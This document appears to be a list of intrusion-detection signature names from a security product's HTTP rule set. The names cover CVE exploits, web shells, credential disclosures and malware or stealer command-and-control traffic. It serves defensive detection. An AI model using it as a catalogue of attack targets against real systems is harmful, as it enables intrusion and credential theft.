HTTP_CS-Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE
HTTP_CS-Atlassian-JIRA-Issue-Collector-Directory-Traversal
HTTP_CS-Atlassian-JIRA-Template-Injection-CVE-2019-11581
HTTP_CS-Axis-IP-Camera-Application-Upload
HTTP_CS-Axis-Storpoint-Authentication-Bypass
HTTP_CS-AZORult-Stealer-C2-Traffic
HTTP_CS-Aztec-Forum-Admin-Password-Disclosure
HTTP_CS-Baldr-Botnet-Panel-Shell-Upload-Exploit
HTTP_CS-Bankpatch-Trojan-Request
HTTP_CS-Barracuda-Spam-Firewall-Preview-Email-Command-Execution
HTTP_CS-BD-Wow32-Connect
HTTP_CS-Berbew-Webber-Padodor-Trojan-Log-Upload
HTTP_CS-Bitcoin-Miner-Getwork-JSON-Request
HTTP_CS-Blog-Torrent-Directory-Traversal
HTTP_CS-Blueimp-jQuery-Arbitrary-File-Upload
HTTP_CS-BoidCMS-Command-Injection
HTTP_CS-Bolt-CMS-Authenticated-Remote-Code-Execution
HTTP_CS-Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow
HTTP_CS-Breakingpoint-Generated-HTTP-Request-Message
HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure
HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure
HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation
HTTP_CS-CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service
HTTP_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure
HTTP_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
HTTP_CS-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
HTTP_CS-Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write
HTTP_CS-Cacti-Group-Cacti-Package_import.php-Potential-Arbitrary-File-Write
HTTP_CS-Carberp-Botnet-Traffic-Detected
HTTP_CS-Centreon-formMibs-Command-Injection
HTTP_CS-Certec-atvise-webMI2ADS-Denial-of-Service-2
HTTP_CS-Cgiemail-Encoded-Newline-Spam-Proxy
HTTP_CS-Chamilo-BigUpload-WebShell
HTTP_CS-Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919
HTTP_CS-ChurchInfo-Authenticated-RCE
HTTP_CS-Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free
HTTP_CS-Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection
HTTP_CS-Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass
HTTP_CS-Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE
HTTP_CS-Cisco-IOS-XE-Command-Injection-CVE-2023-20273
HTTP_CS-Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload
HTTP_CS-Cisco-Prime-Infrastructure-And-Epnm-Xmplogfilesdownloadservlet-Directory-Traversal
HTTP_CS-Cisco-RV-Series-Authentication-Bypass-And-Command-Injection
HTTP_CS-Cisco-Security-Agent-Management-Center-Code-Execution
HTTP_CS-Cisco-UCS-Director-Amf-External-Entity-Injection
HTTP_CS-Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Authentication-Bypass-Vulnerability
HTTP_CS-Cisco-UCS-Director-Mycallable-Call-Directory-Traversal
HTTP_CS-Cisco-UCS-Director-Unauthenticated-RCE
HTTP_CS-Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow
HTTP_CS-Clampi-Bot-Traffic
HTTP_CS-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956
HTTP_CS-Client-Stream-Context-Shared-Subexpression
HTTP_CS-Clinics-Patient-Management-System-PHP-File-Upload
HTTP_CS-CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection
HTTP_CS-CMS-Made-Simple-RCE
HTTP_CS-CMS-Made-Simple-Showtime2-File-Upload-RCE
HTTP_CS-CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969
HTTP_CS-CodeIgniter-Common.php-Insecure-Deserialization
HTTP_CS-Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass
HTTP_CS-Conficker-Worm-Request
HTTP_CS-Contec-Conprossys-HMI-System-Chkformula-Command-Injection
HTTP_CS-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CS-CrushFTP-Potential-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CS-Crystal-Reports-File-Removal
HTTP_CS-CSuiteCRM-Log-File-Remote-Code-Execution
HTTP_CS-CUPS-Gif-Decoding-Routine-Buffer-Overflow
HTTP_CS-CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow
HTTP_CS-Cyberpanel-Getresetstatus-Command-Injection
HTTP_CS-Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376
HTTP_CS-D-Link-CWM-100-Remote-Code-Execution
HTTP_CS-D-Link-D-View-Adddv7probe-External-Entity-Injection
HTTP_CS-D-Link-D-View-Uploadfile-Directory-Traversal
HTTP_CS-D-Link-D-View-Uploadmib-Directory-Traversal
HTTP_CS-D-Link-DIR-809-Devices-Buffer-Overflow
HTTP_CS-D-Link-DIR-859-Gena.cgi-Remote-Command-Execution
HTTP_CS-D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500
HTTP_CS-D-Link-HNAP-Request-Stack-Buffer-Overflow
HTTP_CS-Danmec-Traffic
HTTP_CS-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS
HTTP_CS-DEBUG-Request
HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection
HTTP_CS-Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207
HTTP_CS-Delta-Electronics-Infrasuite-Potential-Insecure-Deserialization-CVE-2023-47207
HTTP_CS-Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection
HTTP_CS-Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting
HTTP_CS-Diaenergie-SQL-Injection-CVE-2024-4548
HTTP_CS-Digium-Asterisk-Cookie-Stack-Overflow
HTTP_CS-Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service
HTTP_CS-Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
HTTP_CS-DirectConnect-Client-To-Client-Handshake
HTTP_CS-Directory-Traversal-Cmd-Exe-System-Compromise
HTTP_CS-Diva-ISDN-Password-BOF
HTTP_CS-Django-Multipartparser.py-Parse-Denial-Of-Service
HTTP_CS-DLINK-DWL-2600-Authenticated-RCI
HTTP_CS-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
HTTP_CS-Dotcms-RCE-Via-Arbitrary-File-Upload
HTTP_CS-DrayTek-Vigor-Command-Execution-CVE-2020-15415
HTTP_CS-Dreamloader-Bot-Traffic
HTTP_CS-Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting
HTTP_CS-Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service
HTTP_CS-Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow
HTTP_CS-Eaton-Intelligent-Power-Manager-System-Command-Injection
HTTP_CS-Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection
HTTP_CS-elFinder-PHP-Connector-Exiftran-Command-Injection
HTTP_CS-Elog-Web-Logbook-BOF
HTTP_CS-Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read
HTTP_CS-Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE
HTTP_CS-Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free
HTTP_CS-EMC-Cmcne-Fileuploadcontroller-Information-Disclosure
HTTP_CS-EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload
HTTP_CS-EMC-Data-Protection-Advisor-Application-Service-Static-Credentials-Authentication-Bypass
HTTP_CS-Emotet-Malware-Infection-Traffic
HTTP_CS-ENC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload
HTTP_CS-Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion
HTTP_CS-Esignal-Buffer-Overflow
HTTP_CS-Excessively-Long-Asp-Include-File-Argument
HTTP_CS-Excessively-Long-Request-Version-Field
HTTP_CS-Executor-Backdoor
HTTP_CS-F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator
HTTP_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
HTTP_CS-File-Sharing-Wizard-POST-SEH-Buffer-Overflow
HTTP_CS-Fivetoon-Activity
HTTP_CS-Foreman-Bookmarks-Creation-Remote-Code-Injection
HTTP_CS-Formbook-Malware-Infection-Traffic
HTTP_CS-FortiLogger-Arbitrary-File-Upload-Exploit
HTTP_CS-Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952
HTTP_CS-Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567
HTTP_CS-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
HTTP_CS-FreePBX-Recording-Interface-File-Upload-Code-Execution
HTTP_CS-Froxlor-Log-Path-RCE
HTTP_CS-FusionPBX-Fax-Server-Fax_Send-Command-Injection
HTTP_CS-GENESIS32-And-GENESIS64-GenBroker.exe-DoS
HTTP_CS-Gh0st-C2-Server-Buffer-Overflow
HTTP_CS-Gila-CMS-Media-assets.php-Path-Traversal
HTTP_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
HTTP_CS-Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting
HTTP_CS-Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting
HTTP_CS-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
HTTP_CS-Gitlab-File-Read-Remote-Code-Execution
HTTP_CS-GLPI-Rest-API-User_Token-SQL-Injection
HTTP_CS-GoAhead-Deep-Directory-BOF
HTTP_CS-Gozi-Malware-Infection-Traffic
HTTP_CS-Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution
HTTP_CS-Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE
HTTP_CS-Grav-CMS-Page-Media-Upload-Directory-Traversal
HTTP_CS-GuLoader-Malware-Infection-Traffic
HTTP_CS-Gumblar-Bot-Traffic
HTTP_CS-Haproxy-HTTP2-HPACK-Out-of-Bound-Write
HTTP_CS-Hashicorp-Nomad-Remote-Command-Execution
HTTP_CS-Head-Slash-Host
HTTP_CS-HIDDEN-COBRA-Beacon-COPPERHEDGE
HTTP_CS-Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery
HTTP_CS-HorizontCMS-Arbitrary-PHP-File-Upload
HTTP_CS-HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection
HTTP_CS-HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection
HTTP_CS-HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection
HTTP_CS-HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection
HTTP_CS-HP-LoadRunner-Buffer-Overflow
HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal
HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal
HTTP_CS-HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow
HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF
HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF
HTTP_CS-HP-Operations-Agent-Opcode-0x34-Stack-Buffer-Overflow
HTTP_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
HTTP_CS-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass
HTTP_CS-HP-Procurve-Manager-Snac-File-Upload
HTTP_CS-HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution
HTTP_CS-HP-Release-Control-Authenticated-Privilege-Escalation
HTTP_CS-HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal
HTTP_CS-HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution
HTTP_CS-HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure
HTTP_CS-HP-Sitescope-Log-Analyzer-Information-Disclosure
HTTP_CS-HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass
HTTP_CS-HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures
HTTP_CS-HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection
HTTP_CS-HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization
HTTP_CS-HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal
HTTP_CS-HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload
HTTP_CS-HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization
HTTP_CS-HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization
HTTP_CS-HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization
HTTP_CS-HPE-Operations-Orchestration-Insecure-Deserialization
HTTP_CS-HTML-In-HTTP-POST
HTTP_CS-HTTP2-Connection-Preface
HTTP_CS-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
HTTP_CS-HTTP_Request-TRACE-2
HTTP_CS-HuntBar-SiteReview
HTTP_CS-IBM-Data-Risk-Manager-Unathenticated-RCE
HTTP_CS-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow
HTTP_CS-IBM-Operational-Decision-Manager-Datasource-JNDI-Injection
HTTP_CS-IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection
HTTP_CS-IBM-System-Director-Agent-DLL-Injection
HTTP_CS-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
HTTP_CS-Icecast-Multiple-Header-Line-Buffer-Overflow
HTTP_CS-Icecast-Server-Authurl-Stack-Buffer-Overflow
HTTP_CS-Icecast-Server-Base64-Authorization-BOF
HTTP_CS-ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification
HTTP_CS-iCMS-admincp.php-SQL-Injection
HTTP_CS-Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery
HTTP_CS-Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery
HTTP_CS-Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery
HTTP_CS-IIS-Asp-Server-Side-Include-Function-Vulnerability
HTTP_CS-IIS-Fp-BOF-MS03-051
HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-1
HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-2
HTTP_CS-IIS-Isapi-Dot-Printer-BOF
HTTP_CS-IIS-Isapi-Windows-Media-Services-BOF-1
HTTP_CS-IIS-Ntdll-WebDAV-BOF
HTTP_CS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030
HTTP_CS-Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
HTTP_CS-Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Upload
HTTP_CS-Index-Directory-Disclosure-Attempt
HTTP_CS-Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass
HTTP_CS-Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization
HTTP_CS-Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE
HTTP_CS-Invalid-Value-After-Request-Method
HTTP_CS-Invision-Power-Board-PHP-Remote-Code-Execution
HTTP_CS-ISPConfig-Remote-Command-Execution
HTTP_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
HTTP_CS-Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass
HTTP_CS-Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908
HTTP_CS-Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282
HTTP_CS-Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read
HTTP_CS-Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery
HTTP_CS-Jenkins-Ci-Server-Xstream-Insecure-Deserialization
HTTP_CS-Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898
HTTP_CS-Jenkins-Core-Fileparametervalue-Directory-Traversal
HTTP_CS-Jenkins-Core-JSON-Lib-Denial-Of-Service
HTTP_CS-Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting
HTTP_CS-Jenkins-Nuget-Plugin-External-Entity-Injection
HTTP_CS-Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection
HTTP_CS-Joomla-Arbitrary-File-Upload
HTTP_CS-Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting
HTTP_CS-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
HTTP_CS-Joomla-TinyBrowser-File-Upload-Code-Execution
HTTP_CS-Kelihos-Traffic
HTTP_CS-Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization
HTTP_CS-KPOT-Stealer-Traffic
HTTP_CS-Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation
HTTP_CS-Labview-Web-Server-Denial-Of-Service
HTTP_CS-LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal
HTTP_CS-LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion
HTTP_CS-Lansweeper-Assetactions-Directory-Traversal
HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CS-Lethic-Activity
HTTP_CS-LG-Simple-Editor-Deletechecksession-Directory-Traversal
HTTP_CS-LG-Simple-Editor-Deletefolder-Directory-Traversal
HTTP_CS-LG-Simple-Editor-Remote-Code-Execution
HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow
HTTP_CS-LibreNMS-API-Token-Stored-Cross-Site-Scripting
HTTP_CS-LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting
HTTP_CS-Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability
HTTP_CS-LimeSurvey-Zip-Path-Traversals
HTTP_CS-Log4j-Denial-of-Service-CVE-2021-45105
HTTP_CS-Logback-Remote-Code-Execution
HTTP_CS-Loki-Bot-C2-Traffic
HTTP_CS-Maarch-LetterBox-Unrestricted-File-Upload
HTTP_CS-Macontrol-Traffic
HTTP_CS-Mailfile-Cgi-File-Disclosure
HTTP_CS-Malicious-WebSocket-Traffic
HTTP_CS-Manageengine-Adselfservice-Plus-Custom-Script-Execution
HTTP_CS-Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal
HTTP_CS-Manjusaka-C2-GET-Request
HTTP_CS-Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset
HTTP_CS-MantisBT-XmlImportExport-PHP-Code-Injection
HTTP_CS-MaraCMS-Arbitrary-PHP-File-Upload
HTTP_CS-Maze-Ransomware-Traffic
HTTP_CS-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow
HTTP_CS-McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow
HTTP_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
HTTP_CS-McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution
HTTP_CS-MediaWiki-Script-Injection
HTTP_CS-Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass
HTTP_CS-Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468
HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write-2
HTTP_CS-Microsoft-IIS-IDA-Path-Disclosure
HTTP_CS-Microsoft-IIS-Request-Header-Buffer-Overflow
HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-016
HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-044
HTTP_CS-Microsoft-IIS-WebDAV-Search-DOS-MS01-016
HTTP_CS-Microsoft-IIS-WebDAV-Source-Code-Disclosure
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-2
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-3
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-4
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-5
HTTP_CS-Microsoft-OMI-Management-Interface-Authentication-Bypass
HTTP_CS-Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection
HTTP_CS-Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure
HTTP_CS-Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964
HTTP_CS-Microsoft-Sharepoint-Server-Business-Data-Connectivity-Unsafe-Reflection
HTTP_CS-Microsoft-SharePoint-Server-ChartWebPartDataStorage-Insecure-Deserialization
HTTP_CS-Microsoft-SharePoint-Server-ExecuteBdcMethod-Unsafe-Reflection-CVE-2024-38227
HTTP_CS-Microsoft-Sharepoint-Server-Generateproxyassembly-Code-Injection-CVE-2023-24955
HTTP_CS-Microsoft-Sharepoint-Server-Potential-Unsafe-Deserialization
HTTP_CS-Microsoft-Sharepoint-Server-Subscribe-Unsafe-Reflection
HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Deserialization-CVE-2024-30044
HTTP_CS-Microsoft-Sharepoint-Server-Unsafe-Reflection-CVE-2024-38023
HTTP_CS-Microsoft-SharePoint-Server-Web-Parts-RCE
HTTP_CS-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
HTTP_CS-Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE
HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability
HTTP_CS-Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability
HTTP_CS-Microsoft-Windows-UPnP-Service-Remote-Code-Execution
HTTP_CS-Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service
HTTP_CS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
HTTP_CS-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952
HTTP_CS-MikroTik-RouterOS-Authentication-Bypass
HTTP_CS-Minishare-1.4.1-Buffer-Overflow
HTTP_CS-MirrorBlast-Malware-Infection-Traffic
HTTP_CS-Mofei.P-Traffic
HTTP_CS-Monitorr-Unauthenticated-Remote-Code-Execution
HTTP_CS-Moodle-Admin-Shell-Upload
HTTP_CS-MosConfig-Code-Injection-Remote-Compromise-2
HTTP_CS-Motorola-WR850G-Authentication-Bypass
HTTP_CS-Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass
HTTP_CS-MS-IIS-HTTP-TRACK-Logging-Failure
HTTP_CS-MSADCS-Content-Type-BOF
HTTP_CS-MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861
HTTP_CS-MSN-Login
HTTP_CS-MSNBot-Web-Spider
HTTP_CS-Multipart-Filename-Potential-Directory-Traversal
HTTP_CS-Multiple-Host-Headers
HTTP_CS-Multiple-Illegal-Url-Characters
HTTP_CS-Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution
HTTP_CS-Mutiny-Arbitrary-File-Upload
HTTP_CS-mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407
HTTP_CS-Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery
HTTP_CS-Nagios-XI-Authenticated-Remote-Command-Execution
HTTP_CS-Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection
HTTP_CS-Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload
HTTP_CS-Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection
HTTP_CS-Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection
HTTP_CS-Nagios-XI-Windows-Winrm-Command-Injection
HTTP_CS-Necta-LLC-WiFi-Mouse-RCE
HTTP_CS-NetAlertX-Unauthenticated-Arbitrary-File-Read
HTTP_CS-NetData-Streaming-Alert-Command-Injection
HTTP_CS-Netgate-Pfsense-Restore_rrddata-Command-Injection
HTTP_CS-NetGear-DGN2200-dnslookup.cgi-Command-Injection
HTTP_CS-NetGear-NMS300-Fileuploadutils-Directory-Traversal
HTTP_CS-NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload
HTTP_CS-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
HTTP_CS-NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset
HTTP_CS-NetMotion-Mobility-Server-MvcUtil-Java-Deserialization
HTTP_CS-Netscape-Enterprice-Server-Revlog-DoS
HTTP_CS-NetSupport-RAT-Infection-Traffic
HTTP_CS-Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection
HTTP_CS-Netwin-CWMail-ShellCode-Detect
HTTP_CS-Netwin-SurgeMail-Header-Line-BOF
HTTP_CS-No-User-Agent-Provided-In-HTTP-Headers
HTTP_CS-Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service
HTTP_CS-nopCommerce-nopCommerce-BackupAction-Directory-Traversal
HTTP_CS-Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow
HTTP_CS-Novell-eDirectory-HTTP-Headers-Denial-Of-Service
HTTP_CS-Novell-eDirectory-Server-Accept-Language-Buffer-Overflow
HTTP_CS-Novell-File-Reporter-SRS-Arbitrary-File-Retrieval
HTTP_CS-Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal
HTTP_CS-Novell-iManager-Servlet-Modulemanager-Upload-Vulnerability
HTTP_CS-Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow
HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass
HTTP_CS-Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow
HTTP_CS-Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass
HTTP_CS-Novell-Service-Desk-Clientimportuploadform-Directory-Traversal
HTTP_CS-Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution
HTTP_CS-Novell-ZENworks-Asset-Management-Directory-Traversal
HTTP_CS-Novell-ZENworks-Configuration-Management-File-Upload
HTTP_CS-Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal
HTTP_CS-Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting
HTTP_CS-Openmetadata-Spel-Injection-CVE-2024-28253
HTTP_CS-Openmrs-Webservices.rest-Insecure-Object-Deserialization
HTTP_CS-OpenX-File-Upload-PHP-Code-Execution
HTTP_CS-Opmantek-Open-Audit-Discoveries_Helper-Command-Injection
HTTP_CS-Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization
HTTP_CS-Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload
HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Creation
HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Deletion
HTTP_CS-Oracle-E-Business-Suite-General-Ledger-SQL-Injection
HTTP_CS-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop
HTTP_CS-Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882
HTTP_CS-Oracle-E-Business-Suite-Web-Applications-Desktop-Integrator-Bnedecoder-Directory-Traversal
HTTP_CS-Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal
HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal
HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability
HTTP_CS-Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution
HTTP_CS-Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604
HTTP_CS-Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal
HTTP_CS-Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-Directory-Traversal
HTTP_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution
HTTP_CS-Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities
HTTP_CS-Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials
HTTP_CS-Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization
HTTP_CS-Oracle-Virtual-Server-Agent-Command-Injection
HTTP_CS-Oracle-WebLogic-Server-Arbitrary-File-Upload
HTTP_CS-Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal
HTTP_CS-Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization
HTTP_CS-Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure
HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization
HTTP_CS-Ozdok-Bot-Activity
HTTP_CS-Pacific-Poker-Login
HTTP_CS-Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion
HTTP_CS-Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery
HTTP_CS-Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection
